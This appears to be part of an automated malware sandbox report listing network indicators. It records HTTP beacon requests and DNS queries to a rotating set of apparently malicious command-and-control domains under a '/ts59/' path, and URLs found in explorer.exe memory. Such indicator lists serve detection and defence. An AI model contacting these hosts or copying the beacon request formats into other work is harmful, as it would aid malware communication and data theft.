          Source: global trafficHTTP traffic detected: GET /ts59/?S0GhCH=DR-Lh8FH5BP&Upql=F3s9qclS9ajlyltz5vx8YuFcODa05tGO2XwI753moUwU8ctXmF/lD/LedP+MQBQFZjkX HTTP/1.1Host: www.checkout4xgrow.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ts59/?Upql=FhTWpBv2wlHh+xqdnZr3Px/MyxZeSSML3WZDSneysGfSXRBJ9ZV2+MGZCGSdE3MN2wai&S0GhCH=DR-Lh8FH5BP HTTP/1.1Host: www.kgstrengthandperformance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ts59/?Upql=Q0rerqlMM+Mzf1m4EVXcVVXnMVAfvTa9yYuOwxw9IZ3XTRGu1uzNDOvhpqi9CeNRWR+i&S0GhCH=DR-Lh8FH5BP HTTP/1.1Host: www.babyscan.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ts59/?S0GhCH=DR-Lh8FH5BP&Upql=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVrOgvyVjJmhQ HTTP/1.1Host: www.gb-electric-wheelchairs-8j.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ts59/?Upql=eOJ5wRfCg8ODtwLT+RxU2vRwj/ifTX9ZHMiqr0Mmp4jM1anHRZ8cLTgQ01aLoU+CLIq0&S0GhCH=DR-Lh8FH5BP HTTP/1.1Host: www.76466.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.checkout4xgrow.shop
          Source: global trafficDNS traffic detected: DNS query: www.kgstrengthandperformance.com
          Source: global trafficDNS traffic detected: DNS query: www.bvlazaedi.xyz
          Source: global trafficDNS traffic detected: DNS query: www.babyscan.xyz
          Source: global trafficDNS traffic detected: DNS query: www.gb-electric-wheelchairs-8j.bond
          Source: global trafficDNS traffic detected: DNS query: www.76466.club
          Source: global trafficDNS traffic detected: DNS query: www.ujgddhhfeffsfgg2.group
          Source: global trafficDNS traffic detected: DNS query: www.modleavedepts.online
          Source: global trafficDNS traffic detected: DNS query: www.momura.xyz
          Source: global trafficDNS traffic detected: DNS query: www.gas39.pro
          Source: global trafficDNS traffic detected: DNS query: www.00050516.xyz
          Source: global trafficDNS traffic detected: DNS query: www.topallinoneaccounting.com
          Source: explorer.exe, 00000003.00000000.1438602211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000000.1438602211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000000.1438602211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000000.1438602211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000000.1438329693.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1437589686.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3877014382.0000000002C60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.00050516.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.00050516.xyz/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.00050516.xyz/ts59/www.topallinoneaccounting.com
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.00050516.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.76466.club
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.76466.club/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.76466.club/ts59/www.ujgddhhfeffsfgg2.group
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.76466.clubReferer:
          Source: explorer.exe, 00000003.00000002.3881369935.00000000085E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438491997.00000000085D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290624703.00000000085E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3082368155.00000000085E3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babyscan.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babyscan.xyz/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babyscan.xyz/ts59/www.gb-electric-wheelchairs-8j.bond
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babyscan.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bvlazaedi.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bvlazaedi.xyz/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bvlazaedi.xyz/ts59/www.babyscan.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bvlazaedi.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.checkout4xgrow.shop
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.checkout4xgrow.shop/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.checkout4xgrow.shop/ts59/www.kgstrengthandperformance.com
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.checkout4xgrow.shopReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ec-delivery-jobs-8j.bond
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ec-delivery-jobs-8j.bond/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ec-delivery-jobs-8j.bond/ts59/www.zu89.top
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ec-delivery-jobs-8j.bondReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gas39.pro
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gas39.pro/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gas39.pro/ts59/www.00050516.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gas39.proReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gb-electric-wheelchairs-8j.bond
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gb-electric-wheelchairs-8j.bond/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gb-electric-wheelchairs-8j.bond/ts59/www.76466.club
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gb-electric-wheelchairs-8j.bondReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kgstrengthandperformance.com
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kgstrengthandperformance.com/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kgstrengthandperformance.com/ts59/www.bvlazaedi.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kgstrengthandperformance.comReferer:
          Source: explorer.exe, 00000003.00000002.3887605921.000000001097F000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3877340789.000000000574F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.modleavedepts.online
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.modleavedepts.online/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.modleavedepts.online/ts59/www.momura.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.modleavedepts.onlineReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.momura.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.momura.xyz/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.momura.xyz/ts59/www.gas39.pro
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.momura.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texhio.online
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texhio.online/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texhio.online/ts59/www.ec-delivery-jobs-8j.bond
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texhio.onlineReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topallinoneaccounting.com
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topallinoneaccounting.com/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topallinoneaccounting.com/ts59/www.zangbreaker.com
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topallinoneaccounting.comReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ujgddhhfeffsfgg2.group
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ujgddhhfeffsfgg2.group/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ujgddhhfeffsfgg2.group/ts59/www.modleavedepts.online
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ujgddhhfeffsfgg2.groupReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zangbreaker.com
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zangbreaker.com/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zangbreaker.com/ts59/www.texhio.online
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zangbreaker.comReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zu89.top
          Source: explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zu89.top/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zu89.topReferer:
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BD22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
